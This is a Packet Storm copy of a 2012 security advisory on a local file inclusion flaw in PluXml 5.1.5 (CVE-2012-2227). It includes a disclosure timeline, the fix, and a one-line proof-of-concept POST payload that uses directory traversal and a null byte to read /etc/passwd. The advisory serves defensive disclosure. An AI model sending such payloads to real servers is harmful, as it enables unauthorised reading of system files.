exploit the possibilities

PluXml 5.1.5 Local File Inclusion

PluXml 5.1.5 Local File Inclusion
Posted May 2, 2012
Authored by High-Tech Bridge SA | Site htbridge.com

PluXml version 5.1.5 suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
advisories | CVE-2012-2227
MD5 | 24506b94088b147968c5fcc640eac771

PluXml 5.1.5 Local File Inclusion

Change Mirror Download
Advisory ID: HTB23086
Product: PluXml
Vendor: pluxml.org
Vulnerable Version(s): 5.1.5 and probably prior
Tested Version: 5.1.5
Vendor Notification: 11 April 2012
Vendor Patch: 16 April 2012
Public Disclosure: 2 May 2012
Vulnerability Type: Local File Inclusion
CVE Reference(s): CVE-2012-2227
Solution Status: Fixed by Vendor
Risk Level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered vulnerabiliy in PluXml, which can be exploited to perform Local File Inclusion attacks.


1) Local File Inclusion in PluXml

1.1 Input passed via the "default_lang" POST parameter to /update/index.php is not properly verified before being used in include_once() function and can be exploited to include arbitrary local files.
This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.

The following PoC (Proof of Concept) demonstrates the vulnerability:


POST /update/index.php HTTP/1.1
[...]
Content-Type: application/x-www-form-urlencoded
Content-Length: [...]

default_lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00


-----------------------------------------------------------------------------------------------

Solution:

Upgrade to PluXml 5.1.6

More Information:
http://www.pluxml.org/article59/sortie-de-pluxml-5-1-6
http://telechargements.pluxml.org/changelog

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23086 - https://www.htbridge.com/advisory/HTB23086 - Local File Inclusion in PluXml.
[2] PluXml - http://www.pluxml.org - PluXml is a script to create a site or a blog.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close